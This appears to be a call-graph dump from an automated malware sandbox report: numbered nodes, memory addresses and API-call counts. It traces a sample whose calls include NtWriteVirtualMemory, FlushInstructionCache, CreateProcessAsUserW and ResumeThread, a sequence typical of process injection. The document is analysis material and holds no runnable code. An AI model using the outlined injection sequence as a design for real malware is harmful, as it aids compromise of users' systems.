36431 2b28a1d 36430->36431 36432 2b28274 15 API calls 36431->36432 36433 2b28a36 36432->36433 36434 2b27d78 18 API calls 36433->36434 36435 2b28a95 36434->36435 36490 2b28338 36435->36490 36438 2b28abc 36439 2b14500 11 API calls 36438->36439 36440 2b28ac9 36439->36440 36440->33996 36442 2b146da 36441->36442 36444 2b14530 11 API calls 36443->36444 36445 2b28299 36444->36445 36468 2b2798c 36445->36468 36448 2b147ec 11 API calls 36449 2b282b3 36448->36449 36450 2b282bb GetModuleHandleW GetProcAddress GetProcAddress 36449->36450 36451 2b282ee 36450->36451 36474 2b14500 36451->36474 36455 2b14530 11 API calls 36454->36455 36456 2b27d9d 36455->36456 36457 2b2798c 12 API calls 36456->36457 36458 2b27daa 36457->36458 36459 2b147ec 11 API calls 36458->36459 36460 2b27dba 36459->36460 36479 2b281cc 36460->36479 36463 2b28274 15 API calls 36464 2b27dd3 NtWriteVirtualMemory 36463->36464 36465 2b27dff 36464->36465 36466 2b14500 11 API calls 36465->36466 36467 2b27e0c FreeLibrary 36466->36467 36467->33977 36469 2b2799d 36468->36469 36470 2b14bcc 11 API calls 36469->36470 36472 2b279ad 36470->36472 36471 2b27a19 36471->36448 36472->36471 36478 2b1babc CharNextA 36472->36478 36476 2b14506 36474->36476 36475 2b1452c 36475->36407 36476->36475 36477 2b12c2c 11 API calls 36476->36477 36477->36476 36478->36472 36480 2b14530 11 API calls 36479->36480 36481 2b281ef 36480->36481 36482 2b2798c 12 API calls 36481->36482 36483 2b281fc 36482->36483 36484 2b28204 GetModuleHandleA 36483->36484 36485 2b28274 15 API calls 36484->36485 36486 2b28215 GetModuleHandleA 36485->36486 36487 2b28233 36486->36487 36488 2b144dc 11 API calls 36487->36488 36489 2b27dcd 36488->36489 36489->36463 36491 2b14530 11 API calls 36490->36491 36492 2b2835b 36491->36492 36493 2b14860 11 API calls 36492->36493 36494 2b2837a 36493->36494 36495 2b281cc 17 API calls 36494->36495 36496 2b2838d 36495->36496 36497 2b28274 15 API calls 36496->36497 36498 2b28393 FlushInstructionCache 36497->36498 36499 2b283b9 36498->36499 36500 2b144dc 11 API calls 36499->36500 36501 2b283c1 FreeLibrary 36500->36501 36501->36438 36502 2b37074 36503 2b14860 11 API calls 36502->36503 36504 2b37095 36503->36504 36505 2b147ec 11 API calls 36504->36505 36506 2b370cc 36505->36506 36507 2b289d0 20 API calls 36506->36507 36508 2b370f0 36507->36508 36509 2b14860 11 API calls 36508->36509 36510 2b37111 36509->36510 36511 2b147ec 11 API calls 36510->36511 36512 2b37148 36511->36512 36513 2b289d0 20 API calls 36512->36513 36514 2b3716c 36513->36514 36515 2b14860 11 API calls 36514->36515 36516 2b3718d 36515->36516 36517 2b147ec 11 API calls 36516->36517 36518 2b371c4 36517->36518 36519 2b289d0 20 API calls 36518->36519 36520 2b371e8 36519->36520 36521 2b14860 11 API calls 36520->36521 36522 2b37209 36521->36522 36523 2b147ec 11 API calls 36522->36523 36524 2b37240 36523->36524 36525 2b289d0 20 API calls 36524->36525 36526 2b37264 36525->36526 36527 2b14860 11 API calls 36526->36527 36528 2b37285 36527->36528 36529 2b147ec 11 API calls 36528->36529 36530 2b372bc 36529->36530 36531 2b289d0 20 API calls 36530->36531 36532 2b372e0 36531->36532 36533 2b14860 11 API calls 36532->36533 36534 2b3731a 36533->36534 37323 2b2e0f8 36534->37323 36536 2b37349 37333 2b2f214 36536->37333 36539 2b14860 11 API calls 36540 2b37399 36539->36540 36541 2b147ec 11 API calls 36540->36541 36542 2b373d0 36541->36542 36543 2b289d0 20 API calls 36542->36543 36544 2b373f4 36543->36544 36545 2b14860 11 API calls 36544->36545 36546 2b37415 36545->36546 36547 2b147ec 11 API calls 36546->36547 36548 2b3744c 36547->36548 36549 2b289d0 20 API calls 36548->36549 36550 2b37470 36549->36550 36551 2b14860 11 API calls 36550->36551 36552 2b37491 36551->36552 36553 2b147ec 11 API calls 36552->36553 36554 2b374c8 36553->36554 36555 2b289d0 20 API calls 36554->36555 36556 2b374ec 36555->36556 36557 2b14860 11 API calls 36556->36557 36558 2b3750d 36557->36558 36559 2b147ec 11 API calls 36558->36559 36560 2b37544 36559->36560 36561 2b289d0 20 API calls 36560->36561 36562 2b37568 36561->36562 36563 2b14860 11 API calls 36562->36563 36564 2b37589 36563->36564 36565 2b147ec 11 API calls 36564->36565 36566 2b375c0 36565->36566 36567 2b289d0 20 API calls 36566->36567 36568 2b375e4 36567->36568 36569 2b14860 11 API calls 36568->36569 36570 2b37605 36569->36570 36571 2b147ec 11 API calls 36570->36571 36572 2b3763c 36571->36572 36573 2b289d0 20 API calls 36572->36573 36574 2b37660 36573->36574 36575 2b14860 11 API calls 36574->36575 36576 2b37681 36575->36576 36577 2b147ec 11 API calls 36576->36577 36578 2b376b8 36577->36578 36579 2b289d0 20 API calls 36578->36579 36580 2b376dc 36579->36580 36581 2b14860 11 API calls 36580->36581 36582 2b376fd 36581->36582 36583 2b147ec 11 API calls 36582->36583 36584 2b37734 36583->36584 36585 2b289d0 20 API calls 36584->36585 36586 2b37758 36585->36586 36587 2b14860 11 API calls 36586->36587 36588 2b37779 36587->36588 36589 2b147ec 11 API calls 36588->36589 36590 2b377b0 36589->36590 36591 2b289d0 20 API calls 36590->36591 36592 2b377d4 36591->36592 36593 2b377e9 36592->36593 36594 2b38318 36592->36594 36595 2b14860 11 API calls 36593->36595 36596 2b14860 11 API calls 36594->36596 36598 2b3780a 36595->36598 36597 2b38339 36596->36597 36599 2b147ec 11 API calls 36597->36599 36600 2b147ec 11 API calls 36598->36600 36602 2b38370 36599->36602 36601 2b37841 36600->36601 36603 2b289d0 20 API calls 36601->36603 36604 2b289d0 20 API calls 36602->36604 36605 2b37865 36603->36605 36606 2b38394 36604->36606 36607 2b14860 11 API calls 36605->36607 36608 2b14860 11 API calls 36606->36608 36610 2b37886 36607->36610 36609 2b383b5 36608->36609 36611 2b147ec 11 API calls 36609->36611 36612 2b147ec 11 API calls 36610->36612 36614 2b383ec 36611->36614 36613 2b378bd 36612->36613 36615 2b289d0 20 API calls 36613->36615 36616 2b289d0 20 API calls 36614->36616 36617 2b378e1 36615->36617 36618 2b38410 36616->36618 36619 2b14860 11 API calls 36617->36619 36620 2b14860 11 API calls 36618->36620 36621 2b37902 36619->36621 36622 2b38431 36620->36622 36624 2b147ec 11 API calls 36621->36624 36623 2b147ec 11 API calls 36622->36623 36625 2b38468 36623->36625 36626 2b37939 36624->36626 36628 2b289d0 20 API calls 36625->36628 36627 2b289d0 20 API calls 36626->36627 36629 2b3795d 36627->36629 36630 2b3848c 36628->36630 36631 2b147ec 11 API calls 36629->36631 36632 2b14860 11 API calls 36630->36632 36633 2b37975 36631->36633 36635 2b384ad 36632->36635 37783 2b285bc 36633->37783 36638 2b147ec 11 API calls 36635->36638 36637 2b14860 11 API calls 36640 2b379a7 36637->36640 36639 2b384e4 36638->36639 36641 2b289d0 20 API calls 36639->36641 36642 2b147ec 11 API calls 36640->36642 36643 2b38508 36641->36643 36644 2b379de 36642->36644 36645 2b393a1 36643->36645 36646 2b3851d 36643->36646 36649 2b289d0 20 API calls 36644->36649 36647 2b14860 11 API calls 36645->36647 36648 2b14860 11 API calls 36646->36648 36653 2b393c2 36647->36653 36650 2b3853e 36648->36650 36651 2b37a02 36649->36651 36654 2b38556 36650->36654 36652 2b14860 11 API calls 36651->36652 36658 2b37a23 36652->36658 36656 2b147ec 11 API calls 36653->36656 36655 2b147ec 11 API calls 36654->36655 36657 2b38575 36655->36657 36660 2b393f9 36656->36660 36661 2b3858d 36657->36661 36659 2b147ec 11 API calls 36658->36659 36664 2b37a5a 36659->36664 36662 2b289d0 20 API calls 36660->36662 36663 2b289d0 20 API calls 36661->36663 36665 2b3941d 36662->36665 36666 2b38599 36663->36666 36669 2b289d0 20 API calls 36664->36669 36667 2b14860 11 API calls 36665->36667 36668 2b14860 11 API calls 36666->36668 36673 2b3943e 36667->36673 36670 2b385ba 36668->36670 36671 2b37a7e 36669->36671 36674 2b385c5 36670->36674 36672 2b14860 11 API calls 36671->36672 36677 2b37a9f 36672->36677 36675 2b147ec 11 API calls 36673->36675 36676 2b147ec 11 API calls 36674->36676 36680 2b39475 36675->36680 36678 2b385f1 36676->36678 36679 2b147ec 11 API calls 36677->36679 36681 2b385fc 36678->36681 36686 2b37ad6 36679->36686 36682 2b289d0 20 API calls 36680->36682 36683 2b289d0 20 API calls 36681->36683 36684 2b39499 36682->36684 36685 2b38615 36683->36685 36687 2b14860 11 API calls 36684->36687 36688 2b14860 11 API calls 36685->36688 36689 2b289d0 20 API calls 36686->36689 36690 2b394ba 36687->36690 36691 2b38636 36688->36691 36692 2b37afa 36689->36692 36693 2b147ec 11 API calls 36690->36693 36694 2b147ec 11 API calls 36691->36694 37795 2b2adf8 29 API calls 36692->37795 36699 2b394f1 36693->36699 36698 2b3866d 36694->36698 36696 2b37b21 36697 2b14860 11 API calls 36696->36697 36703 2b37b42 36697->36703 36700 2b289d0 20 API calls 36698->36700 36701 2b289d0 20 API calls 36699->36701 36702 2b38691 36700->36702 36711 2b39515 36701->36711 36704 2b147ec 11 API calls 36702->36704 36706 2b147ec 11 API calls 36703->36706 36705 2b386bd 36704->36705 36709 2b386d5 36705->36709 36710 2b37b79 36706->36710 36707 2b39cf5 36708 2b14860 11 API calls 36707->36708 36714 2b39d16 36708->36714 36715 2b386e0 CreateProcessAsUserW 36709->36715 36713 2b289d0 20 API calls 36710->36713 36711->36707 36712 2b14860 11 API calls 36711->36712 36723 2b39560 36712->36723 36716 2b37b9d 36713->36716 36720 2b147ec 11 API calls 36714->36720 36717 2b386f2 36715->36717 36718 2b3876e 36715->36718 36719 2b14860 11 API calls 36716->36719 36722 2b14860 11 API calls 36717->36722 36721 2b14860 11 API calls 36718->36721 36727 2b37bbe 36719->36727 36728 2b39d4d 36720->36728 36729 2b3878f 36721->36729 36724 2b38713 36722->36724 36726 2b147ec 11 API calls 36723->36726 36725 2b3871e 36724->36725 36732 2b147ec 11 API calls 36725->36732 36734 2b39597 36726->36734 36733 2b147ec 11 API calls 36727->36733 36730 2b289d0 20 API calls 36728->36730 36731 2b147ec 11 API calls 36729->36731 36735 2b39d71 36730->36735 36742 2b387c6 36731->36742 36736 2b3874a 36732->36736 36740 2b37bf5 36733->36740 36738 2b289d0 20 API calls 36734->36738 36737 2b14860 11 API calls 36735->36737 36739 2b38755 36736->36739 36745 2b39d92 36737->36745 36741 2b395bb 36738->36741 36747 2b289d0 20 API calls 36739->36747 36744 2b289d0 20 API calls 36740->36744 36743 2b14860 11 API calls 36741->36743 36746 2b289d0 20 API calls 36742->36746 36753 2b395dc 36743->36753 36748 2b37c19 36744->36748 36751 2b147ec 11 API calls 36745->36751 36749 2b387ea 36746->36749 36747->36718 36750 2b14860 11 API calls 36748->36750 36752 2b14860 11 API calls 36749->36752 36755 2b37c3a 36750->36755 36756 2b39dc9 36751->36756 36757 2b3880b 36752->36757 36754 2b147ec 11 API calls 36753->36754 36762 2b39613 36754->36762 36758 2b147ec 11 API calls 36755->36758 36759 2b289d0 20 API calls 36756->36759 36760 2b147ec 11 API calls 36757->36760 36767 2b37c71 36758->36767 36761 2b39ded 36759->36761 36766 2b38842 36760->36766 36763 2b14860 11 API calls 36761->36763 36764 2b289d0 20 API calls 36762->36764 36770 2b39e0e 36763->36770 36765 2b39637 36764->36765 36768 2b14860 11 API calls 36765->36768 36771 2b289d0 20 API calls 36766->36771 36769 2b289d0 20 API calls 36767->36769 36775 2b39658 36768->36775 36772 2b37c95 36769->36772 36774 2b147ec 11 API calls 36770->36774 36773 2b38866 36771->36773 36777 2b14860 11 API calls 36772->36777 36776 2b149f8 11 API calls 36773->36776 36780 2b39e45 36774->36780 36779 2b147ec 11 API calls 36775->36779 36778 2b3888a 36776->36778 36782 2b37cd5 36777->36782 36781 2b14860 11 API calls 36778->36781 36785 2b3968f 36779->36785 36783 2b289d0 20 API calls 36780->36783 36784 2b388b9 36781->36784 36786 2b147ec 11 API calls 36782->36786 36788 2b39e69 36783->36788 36789 2b388c4 36784->36789 36787 2b289d0 20 API calls 36785->36787 36796 2b37d0c 36786->36796 36790 2b396b3 36787->36790 36794 2b289d0 20 API calls 36788->36794 36792 2b147ec 11 API calls 36789->36792 37345 2b2f094 36790->37345 36795 2b388f0 36792->36795 36801 2b39e9c 36794->36801 36802 2b388fb 36795->36802 36798 2b289d0 20 API calls 36796->36798 36797 2b14860 11 API calls 36803 2b396f7 36797->36803 36799 2b37d30 36798->36799 36800 2b14860 11 API calls 36799->36800 36809 2b37d51 36800->36809 36805 2b289d0 20 API calls 36801->36805 36804 2b289d0 20 API calls 36802->36804 36807 2b14860 11 API calls 36803->36807 36806 2b38914 36804->36806 36811 2b39ecf 36805->36811 36808 2b14860 11 API calls 36806->36808 36812 2b3972f 36807->36812 36813 2b38935 36808->36813 36810 2b147ec 11 API calls 36809->36810 36817 2b37d88 36810->36817 36814 2b289d0 20 API calls 36811->36814 36816 2b147ec 11 API calls 36812->36816 36815 2b147ec 11 API calls 36813->36815 36818 2b39f02 36814->36818 36822 2b3896c 36815->36822 36821 2b39766 36816->36821 36819 2b289d0 20 API calls 36817->36819 36824 2b289d0 20 API calls 36818->36824 36820 2b37dac 36819->36820 36823 2b14860 11 API calls 36820->36823 36825 2b289d0 20 API calls 36821->36825 36827 2b289d0 20 API calls 36822->36827 36833 2b37dcd 36823->36833 36826 2b39f35 36824->36826 36828 2b3978a 36825->36828 36829 2b14860 11 API calls 36826->36829 36830 2b38990 36827->36830 36831 2b14860 11 API calls 36828->36831 36835 2b39f56 36829->36835 36832 2b14860 11 API calls 36830->36832 36836 2b397ab 36831->36836 36837 2b389b1 36832->36837 36834 2b147ec 11 API calls 36833->36834 36841 2b37e04 36834->36841 36838 2b147ec 11 API calls 36835->36838 36839 2b147ec 11 API calls 36836->36839 36840 2b147ec 11 API calls 36837->36840 36842 2b39f8d 36838->36842 36844 2b397e2 36839->36844 36845 2b389e8 36840->36845 36843 2b289d0 20 API calls 36841->36843 36847 2b289d0 20 API calls 36842->36847 36846 2b37e28 36843->36846 36850 2b289d0 20 API calls 36844->36850 36852 2b289d0 20 API calls 36845->36852 37796 2b25aec 42 API calls 36846->37796 36851 2b39fb1 36847->36851 36854 2b39806 36850->36854 36855 2b14860 11 API calls 36851->36855 36856 2b38a0c 36852->36856 36853 2b37e54 36861 2b14bcc 11 API calls 36853->36861 37352 2b17e5c 36854->37352 36867 2b39fd2 36855->36867 37799 2b2d164 23 API calls 36856->37799 36860 2b38a20 36863 2b14860 11 API calls 36860->36863 36864 2b37e69 36861->36864 36862 2b39aef 36866 2b14860 11 API calls 36862->36866 36870 2b38a46 36863->36870 36868 2b14860 11 API calls 36864->36868 36865 2b14860 11 API calls 36871 2b39839 36865->36871 36872 2b39b10 36866->36872 36869 2b147ec 11 API calls 36867->36869 36873 2b37e8a 36868->36873 36877 2b3a009 36869->36877 36874 2b147ec 11 API calls 36870->36874 36875 2b147ec 11 API calls 36871->36875 36876 2b147ec 11 API calls 36872->36876 36878 2b147ec 11 API calls 36873->36878 36881 2b38a7d 36874->36881 36882 2b39870 36875->36882 36883 2b39b47 36876->36883 36879 2b289d0 20 API calls 36877->36879 36885 2b37ec1 36878->36885 36880 2b3a02d 36879->36880 36884 2b14860 11 API calls 36880->36884 36886 2b289d0 20 API calls 36881->36886 36887 2b289d0 20 API calls 36882->36887 36888 2b289d0 20 API calls 36883->36888 36897 2b3a04e 36884->36897 36890 2b289d0 20 API calls 36885->36890 36889 2b38aa1 36886->36889 36891 2b39894 36887->36891 36892 2b39b6b 36888->36892 36893 2b14860 11 API calls 36889->36893 36894 2b37ee5 36890->36894 36895 2b14860 11 API calls 36891->36895 36896 2b14860 11 API calls 36892->36896 36900 2b38ac2 36893->36900 36899 2b149f8 11 API calls 36894->36899 36902 2b398b5 36895->36902 36903 2b39b8c 36896->36903 36898 2b147ec 11 API calls 36897->36898 36909 2b3a085 36898->36909 36901 2b37f02 36899->36901 36905 2b147ec 11 API calls 36900->36905 37797 2b27e50 17 API calls 36901->37797 36907 2b147ec 11 API calls 36902->36907 36908 2b147ec 11 API calls 36903->36908 36912 2b38af9 36905->36912 36906 2b37f08 36910 2b14860 11 API calls 36906->36910 36914 2b398ec 36907->36914 36913 2b39bc3 36908->36913 36911 2b289d0 20 API calls 36909->36911 36916 2b37f29 36910->36916 36919 2b3a0a9 36911->36919 36915 2b289d0 20 API calls 36912->36915 36918 2b289d0 20 API calls 36913->36918 36917 2b289d0 20 API calls 36914->36917 36920 2b38b1d 36915->36920 36921 2b147ec 11 API calls 36916->36921 36922 2b39910 36917->36922 36923 2b39be7 36918->36923 36927 2b289d0 20 API calls 36919->36927 36924 2b14860 11 API calls 36920->36924 36928 2b37f60 36921->36928 36925 2b14860 11 API calls 36922->36925 36926 2b14860 11 API calls 36923->36926 36929 2b38b3e 36924->36929 36930 2b39931 36925->36930 36931 2b39c08 36926->36931 36932 2b3a0dc 36927->36932 36933 2b289d0 20 API calls 36928->36933 36934 2b147ec 11 API calls 36929->36934 36936 2b147ec 11 API calls 36930->36936 36937 2b147ec 11 API calls 36931->36937 36938 2b289d0 20 API calls 36932->36938 36935 2b37f84 36933->36935 36940 2b38b75 36934->36940 36939 2b14860 11 API calls 36935->36939 36941 2b39968 36936->36941 36942 2b39c3f 36937->36942 36943 2b3a10f 36938->36943 36945 2b37fa5 36939->36945 36944 2b289d0 20 API calls 36940->36944 36949 2b289d0 20 API calls 36941->36949 36946 2b289d0 20 API calls 36942->36946 36947 2b289d0 20 API calls 36943->36947 36948 2b38b99 36944->36948 36954 2b147ec 11 API calls 36945->36954 36951 2b39c63 36946->36951 36961 2b3a142 36947->36961 36952 2b38ba2 36948->36952 36953 2b38bb9 36948->36953 36950 2b3998c 36949->36950 37356 2b2e358 36950->37356 36956 2b14860 11 API calls 36951->36956 37800 2b28730 17 API calls 36952->37800 36958 2b14860 11 API calls 36953->36958 36962 2b37fdc 36954->36962 36965 2b39c84 36956->36965 36967 2b38bda 36958->36967 36960 2b14530 11 API calls 36963 2b399b1 36960->36963 36966 2b289d0 20 API calls 36961->36966 36968 2b289d0 20 API calls 36962->36968 36964 2b14860 11 API calls 36963->36964 36973 2b399d2 36964->36973 36970 2b147ec 11 API calls 36965->36970 36974 2b3a175 36966->36974 36971 2b147ec 11 API calls 36967->36971 36969 2b38000 36968->36969 36972 2b14860 11 API calls 36969->36972 36977 2b39cbb 36970->36977 36975 2b38c11 36971->36975 36979 2b38021 36972->36979 36976 2b147ec 11 API calls 36973->36976 36978 2b289d0 20 API calls 36974->36978 36981 2b289d0 20 API calls 36975->36981 36989 2b39a09 36976->36989 36982 2b289d0 20 API calls 36977->36982 36980 2b3a1a8 36978->36980 36986 2b147ec 11 API calls 36979->36986 36983 2b14860 11 API calls 36980->36983 36985 2b38c35 36981->36985 36984 2b39cdf 36982->36984 36993 2b3a1c9 36983->36993 37376 2b149f8 36984->37376 36988 2b14860 11 API calls 36985->36988 36994 2b38058 36986->36994 36998 2b38c56 36988->36998 36991 2b289d0 20 API calls 36989->36991 36995 2b39a2d 36991->36995 36997 2b147ec 11 API calls 36993->36997 36999 2b289d0 20 API calls 36994->36999 36996 2b14860 11 API calls 36995->36996 37003 2b39a4e 36996->37003 37004 2b3a200 36997->37004 37001 2b147ec 11 API calls 36998->37001 37000 2b3807c 36999->37000 37002 2b14860 11 API calls 37000->37002 37007 2b38c8d 37001->37007 37008 2b3809d 37002->37008 37005 2b147ec 11 API calls 37003->37005 37006 2b289d0 20 API calls 37004->37006 37015 2b39a85 37005->37015 37009 2b3a224 37006->37009 37010 2b289d0 20 API calls 37007->37010 37013 2b147ec 11 API calls 37008->37013 37011 2b14860 11 API calls 37009->37011 37012 2b38cb1 37010->37012 37016 2b3a245 37011->37016 37014 2b14860 11 API calls 37012->37014 37018 2b380d4 37013->37018 37020 2b38cd2 37014->37020 37017 2b289d0 20 API calls 37015->37017 37019 2b147ec 11 API calls 37016->37019 37026 2b39aa9 37017->37026 37021 2b289d0 20 API calls 37018->37021 37025 2b3a27c 37019->37025 37023 2b147ec 11 API calls 37020->37023 37022 2b380f8 37021->37022 37798 2b2b118 39 API calls 37022->37798 37029 2b38d09 37023->37029 37028 2b289d0 20 API calls 37025->37028 37361 2b2dc8c 37026->37361 37034 2b3a2a0 37028->37034 37031 2b289d0 20 API calls 37029->37031 37030 2b38109 37032 2b38d2d ResumeThread 37031->37032 37033 2b14860 11 API calls 37032->37033 37038 2b38d59 37033->37038 37035 2b289d0 20 API calls 37034->37035 37036 2b3a2d3 37035->37036 37037 2b14860 11 API calls 37036->37037 37040 2b3a2f4 37037->37040 37039 2b147ec 11 API calls 37038->37039 37042 2b38d90 37039->37042 37041 2b147ec 11 API calls 37040->37041 37045 2b3a32b 37041->37045 37043 2b289d0 20 API calls 37042->37043 37044 2b38db4 37043->37044 37046 2b14860 11 API calls 37044->37046 37047 2b289d0 20 API calls 37045->37047 37049 2b38dd5 37046->37049 37048 2b3a34f 37047->37048 37050 2b14860 11 API calls 37048->37050 37051 2b147ec 11 API calls 37049->37051 37052 2b3a370 37050->37052 37054 2b38e0c 37051->37054 37053 2b147ec 11 API calls 37052->37053 37057 2b3a3a7 37053->37057 37055 2b289d0 20 API calls 37054->37055 37056 2b38e30 37055->37056 37058 2b14860 11 API calls 37056->37058 37059 2b289d0 20 API calls 37057->37059 37061 2b38e51 37058->37061 37060 2b3a3cb 37059->37060 37062 2b14860 11 API calls 37060->37062 37063 2b147ec 11 API calls 37061->37063 37064 2b3a3ec 37062->37064 37066 2b38e88 37063->37066 37065 2b147ec 11 API calls 37064->37065 37069 2b3a423 37065->37069 37067 2b289d0 20 API calls 37066->37067 37068 2b38eac CloseHandle 37067->37068 37070 2b14860 11 API calls 37068->37070 37071 2b289d0 20 API calls 37069->37071 37072 2b38ed8 37070->37072 37074 2b3a447 37071->37074 37073 2b147ec 11 API calls 37072->37073 37076 2b38f0f 37073->37076 37075 2b289d0 20 API calls 37074->37075 37077 2b3a47a 37075->37077 37078 2b289d0 20 API calls 37076->37078 37080 2b289d0 20 API calls 37077->37080 37079 2b38f33 37078->37079 37081 2b14860 11 API calls 37079->37081 37082 2b3a4ad 37080->37082 37083 2b38f54 37081->37083 37084 2b289d0 20 API calls 37082->37084 37085 2b147ec 11 API calls 37083->37085 37087 2b3a4e0 37084->37087 37086 2b38f8b 37085->37086 37089 2b289d0 20 API calls 37086->37089 37088 2b289d0 20 API calls 37087->37088 37090 2b3a513 37088->37090 37091 2b38faf 37089->37091 37092 2b14860 11 API calls 37090->37092 37093 2b14860 11 API calls 37091->37093 37094 2b3a534 37092->37094 37095 2b38fd0 37093->37095 37096 2b147ec 11 API calls 37094->37096 37097 2b147ec 11 API calls 37095->37097 37099 2b3a56b 37096->37099 37098 2b39007 37097->37098 37100 2b289d0 20 API calls 37098->37100 37101 2b289d0 20 API calls 37099->37101 37103 2b3902b 37100->37103 37102 2b3a58f 37101->37102 37104 2b14860 11 API calls 37102->37104 37105 2b14860 11 API calls 37103->37105 37106 2b3a5b0 37104->37106 37107 2b3904c 37105->37107 37108 2b147ec 11 API calls 37106->37108 37109 2b147ec 11 API calls 37107->37109 37110 2b3a5e7 37108->37110 37111 2b39083 37109->37111 37113 2b289d0 20 API calls 37110->37113 37112 2b289d0 20 API calls 37111->37112 37114 2b390a7 37112->37114 37116 2b3a60b 37113->37116 37115 2b14860 11 API calls 37114->37115 37118 2b390c8 37115->37118 37117 2b289d0 20 API calls 37116->37117 37120 2b3a63e 37117->37120 37119 2b147ec 11 API calls 37118->37119 37122 2b390ff 37119->37122 37121 2b289d0 20 API calls 37120->37121 37126 2b3a671 37121->37126 37123 2b289d0 20 API calls 37122->37123 37124 2b39123 37123->37124 37125 2b14860 11 API calls 37124->37125 37128 2b39144 37125->37128 37127 2b289d0 20 API calls 37126->37127 37129 2b3a6a4 37127->37129 37130 2b147ec 11 API calls 37128->37130 37131 2b289d0 20 API calls 37129->37131 37132 2b3917b 37130->37132 37133 2b3a6d7 37131->37133 37134 2b289d0 20 API calls 37132->37134 37136 2b289d0 20 API calls 37133->37136 37135 2b3919f 37134->37135 37137 2b14860 11 API calls 37135->37137 37138 2b3a70a 37136->37138 37140 2b391c0 37137->37140 37139 2b14860 11 API calls 37138->37139 37141 2b3a72b 37139->37141 37142 2b147ec 11 API calls 37140->37142 37143 2b147ec 11 API calls 37141->37143 37144 2b391f7 37142->37144 37145 2b3a762 37143->37145 37146 2b289d0 20 API calls 37144->37146 37148 2b289d0 20 API calls 37145->37148 37147 2b3921b 37146->37147 37801 2b2894c LoadLibraryW 37147->37801 37149 2b3a786 37148->37149 37150 2b14860 11 API calls 37149->37150 37156 2b3a7a7 37150->37156 37153 2b2894c 21 API calls 37154 2b3924e 37153->37154 37155 2b2894c 21 API calls 37154->37155 37157 2b39262 37155->37157 37158 2b147ec 11 API calls 37156->37158 37159 2b2894c 21 API calls 37157->37159 37163 2b3a7de 37158->37163 37160 2b39276 37159->37160 37161 2b2894c 21 API calls 37160->37161 37162 2b3928a 37161->37162 37164 2b2894c 21 API calls 37162->37164 37166 2b289d0 20 API calls 37163->37166 37165 2b3929e CloseHandle 37164->37165 37167 2b14860 11 API calls 37165->37167 37168 2b3a802 37166->37168 37170 2b392ca 37167->37170 37169 2b14860 11 API calls 37168->37169 37172 2b3a823 37169->37172 37171 2b147ec 11 API calls 37170->37171 37174 2b39301 37171->37174 37173 2b147ec 11 API calls 37172->37173 37175 2b3a85a 37173->37175 37176 2b289d0 20 API calls 37174->37176 37178 2b289d0 20 API calls 37175->37178 37177 2b39325 37176->37177 37179 2b14860 11 API calls 37177->37179 37180 2b3a87e 37178->37180 37182 2b39346 37179->37182 37181 2b14860 11 API calls 37180->37181 37183 2b3a89f 37181->37183 37184 2b147ec 11 API calls 37182->37184 37185 2b147ec 11 API calls 37183->37185 37186 2b3937d 37184->37186 37187 2b3a8d6 37185->37187 37188 2b289d0 20 API calls 37186->37188 37189 2b289d0 20 API calls 37187->37189 37188->36645 37190 2b3a8fa 37189->37190 37191 2b14860 11 API calls 37190->37191 37192 2b3a91b 37191->37192 37193 2b147ec 11 API calls 37192->37193 37194 2b3a952 37193->37194 37195 2b289d0 20 API calls 37194->37195 37196 2b3a976 37195->37196 37197 2b289d0 20 API calls 37196->37197 37198 2b3a985 37197->37198 37199 2b289d0 20 API calls 37198->37199 37200 2b3a994 37199->37200 37201 2b289d0 20 API calls 37200->37201 37202 2b3a9a3 37201->37202 37203 2b289d0 20 API calls 37202->37203 37204 2b3a9b2 37203->37204 37205 2b289d0 20 API calls 37204->37205 37206 2b3a9c1 37205->37206 37207 2b289d0 20 API calls 37206->37207 37208 2b3a9d0 37207->37208 37209 2b289d0 20 API calls 37208->37209 37210 2b3a9df 37209->37210 37211 2b289d0 20 API calls 37210->37211 37212 2b3a9ee 37211->37212 37213 2b289d0 20 API calls 37212->37213 37214 2b3a9fd 37213->37214 37215 2b289d0 20 API calls 37214->37215 37216 2b3aa0c 37215->37216 37217 2b289d0 20 API calls 37216->37217 37218 2b3aa1b 37217->37218 37219 2b289d0 20 API calls 37218->37219 37220 2b3aa2a 37219->37220 37221 2b289d0 20 API calls 37220->37221 37222 2b3aa39 37221->37222 37223 2b289d0 20 API calls 37222->37223 37224 2b3aa48 37223->37224 37225 2b289d0 20 API calls 37224->37225 37226 2b3aa57 37225->37226 37227 2b14860 11 API calls 37226->37227 37228 2b3aa78 37227->37228 37229 2b147ec 11 API calls 37228->37229 37230 2b3aaaf 37229->37230 37231 2b289d0 20 API calls 37230->37231 37232 2b3aad3 37231->37232 37233 2b289d0 20 API calls 37232->37233 37234 2b3ab06 37233->37234 37235 2b289d0 20 API calls 37234->37235 37236 2b3ab39 37235->37236 37237 2b289d0 20 API calls 37236->37237 37238 2b3ab6c 37237->37238 37239 2b289d0 20 API calls 37238->37239 37240 2b3ab9f 37239->37240 37241 2b289d0 20 API calls 37240->37241 37242 2b3abd2 37241->37242 37243 2b289d0 20 API calls 37242->37243 37244 2b3ac05 37243->37244 37245 2b289d0 20 API calls 37244->37245 37246 2b3ac38 37245->37246 37247 2b14860 11 API calls 37246->37247 37248 2b3ac59 37247->37248 37249 2b147ec 11 API calls 37248->37249 37250 2b3ac90 37249->37250 37251 2b289d0 20 API calls 37250->37251 37252 2b3acb4 37251->37252 37253 2b14860 11 API calls 37252->37253 37254 2b3acd5 37253->37254 37255 2b147ec 11 API calls 37254->37255 37256 2b3ad0c 37255->37256 37257 2b289d0 20 API calls 37256->37257 37258 2b3ad30 37257->37258 37259 2b14860 11 API calls 37258->37259 37260 2b3ad51 37259->37260 37261 2b147ec 11 API calls 37260->37261 37262 2b3ad88 37261->37262 37263 2b289d0 20 API calls 37262->37263 37264 2b3adac 37263->37264 37265 2b289d0 20 API calls 37264->37265 37266 2b3addf 37265->37266 37267 2b289d0 20 API calls 37266->37267 37268 2b3ae12 37267->37268 37269 2b289d0 20 API calls 37268->37269 37270 2b3ae45 37269->37270 37271 2b289d0 20 API calls 37270->37271 37272 2b3ae78 37271->37272 37273 2b289d0 20 API calls 37272->37273 37274 2b3aeab 37273->37274 37275 2b289d0 20 API calls 37274->37275 37276 2b3aede 37275->37276 37277 2b289d0 20 API calls 37276->37277 37278 2b3af11 37277->37278 37279 2b289d0 20 API calls 37278->37279 37280 2b3af44 37279->37280 37281 2b289d0 20 API calls 37280->37281 37282 2b3af77 37281->37282 37283 2b289d0 20 API calls 37282->37283 37284 2b3afaa 37283->37284 37285 2b289d0 20 API calls 37284->37285 37286 2b3afdd 37285->37286 37287 2b289d0 20 API calls 37286->37287 37288 2b3b010 37287->37288 37289 2b289d0 20 API calls 